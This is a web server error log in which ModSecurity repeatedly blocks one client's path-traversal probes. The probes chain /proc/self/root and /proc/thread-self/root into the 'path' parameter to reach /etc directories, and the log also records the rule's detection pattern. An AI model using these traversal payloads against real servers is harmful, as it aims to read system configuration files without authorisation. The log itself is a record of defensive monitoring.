[Thu Mar 19 14:50:37.691128 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:57764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3bda6ubjKNq_cu4Z0igAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:50:42.609016 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.243.128:60930] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3cgbLMZ6AikZjR9V7IgAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:50:47.053403 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.243.128:60930] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3dwbLMZ6AikZjR9V7JQAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:50:52.039075 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.243.128:46684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3fBCii7xarUs8iHYHdgAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:50:52.185793 2026] [proxy_fcgi:error] [pid 7893:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37550] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:50:56.211396 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:46684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3gBCii7xarUs8iHYHgAAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:51:01.195280 2026] [:error] [pid 7545:tid 140411733534464] [client 74.7.243.128:33082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3hX8B84UptSoTJtYtVAAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:51:06.252536 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.243.128:33090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3iv-YZRR_7pZ7nDKpEAAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:51:09.001001 2026] [mime_magic:error] [pid 14269:tid 140411725141760] (70014)End of file found: [client 57.141.18.0:44590] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:51:12.896095 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:43786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3kBCii7xarUs8iHYHhQAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:51:15.081804 2026] [proxy_fcgi:error] [pid 7545:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38378] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:51:19.240196 2026] [proxy_fcgi:error] [pid 7545:tid 140411708356352] [client 141.98.11.117:58636] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/wp-login.php
[Thu Mar 19 14:51:19.462762 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:43802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3lvqxLDW4GITHUkSGxAAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:51:23.654241 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:59670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3m8df6f5d65gmYZSY4QAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:51:28.159575 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:59672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3oOoXxyEfFpUF8f8qWQAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:51:32.881245 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:34564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3pOoXxyEfFpUF8f8qXwAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:51:38.070953 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.243.128:34578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3qgbLMZ6AikZjR9V7PwAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:51:42.118162 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39290] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:51:43.566654 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:51238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3r9a6ubjKNq_cu4Z0qwAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:51:48.139258 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.243.128:51246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3tBCii7xarUs8iHYHpwAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:51:52.811138 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.243.128:51168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3uAbLMZ6AikZjR9V7RgAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:51:57.866605 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:51170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3vQkwaGbbGflqUZDn7gAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:52:05.287296 2026] [:error] [pid 8307:tid 140411632822016] [client 74.7.243.128:38990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3xb-FhjpZGs9ba8qIxgAAAw0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:52:08.122563 2026] [proxy_fcgi:error] [pid 8307:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40174] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:52:11.331666 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:58894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3y-oXxyEfFpUF8f8qfwAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:52:17.014572 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:58906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw30Mdf6f5d65gmYZSY-QAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
